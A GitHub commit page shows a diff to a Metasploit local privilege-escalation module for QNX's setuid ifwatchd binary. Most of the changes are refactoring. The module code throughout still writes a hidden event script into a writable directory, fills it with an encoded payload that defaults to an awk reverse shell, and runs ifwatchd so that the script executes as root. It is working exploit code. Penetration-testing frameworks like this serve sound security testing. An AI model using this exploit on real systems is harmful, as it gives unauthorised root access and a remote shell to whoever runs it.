Permalink
Browse files

Land #9745, Update QNX iwatchd to use newer APIs

  • Loading branch information...
busterb committed Oct 6, 2018
2 parents c9ebe5a + 89b6aaf commit 3d507250b04b48f448856823a54650a0ee9f8319
Showing with 16 additions and 19 deletions.
  1. +16 −19 modules/exploits/qnx/local/ifwatchd_priv_esc.rb
@@ -6,6 +6,7 @@
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::Linux::Priv
include Msf::Post::File
include Msf::Exploit::FileDropper
@@ -61,15 +62,19 @@ def initialize(info = {})
'PAYLOAD' => 'cmd/unix/reverse_awk'
}
))
register_options([
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
])
register_advanced_options [
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def ifwatchd_path
'/sbin/ifwatchd'
end
def base_dir
datastore['WritableDir']
end
def check
unless setuid? ifwatchd_path
vprint_error "#{ifwatchd_path} is not setuid"
@@ -80,25 +85,20 @@ def check
CheckCode::Detected
end
def base_dir
datastore['WritableDir']
end
def is_root?
id = cmd_exec 'id'
(id.include?('uid=0') && id.include?('root'))
end
def exploit
unless check == CheckCode::Detected
fail_with Failure::NotVulnerable, 'Target not vulnerable'
end
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless check == CheckCode::Detected
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
script_path = "#{base_dir}/.#{rand_text_alphanumeric rand(10..15)}"
script_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
print_status 'Writing interface arrival event script...'
cmd_exec "echo '#!/bin/sh' > #{script_path}"
@@ -107,15 +107,12 @@ def exploit
exp = payload.encoded.gsub('"', '\"').gsub('$', '\$')
cmd_exec "echo \"#{exp}\" >> #{script_path}"
cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}"
register_file_for_cleanup script_path
cmd_exec "chmod +x '#{script_path}'"
print_status "Executing #{ifwatchd_path}..."
interface = 'lo0'
cmd_exec "#{ifwatchd_path} -A '#{script_path}' -v #{interface} >/dev/null & echo "
Rex.sleep 5
cmd_exec "rm -f '#{script_path}'"
end
end

0 comments on commit 3d50725

Please sign in to comment.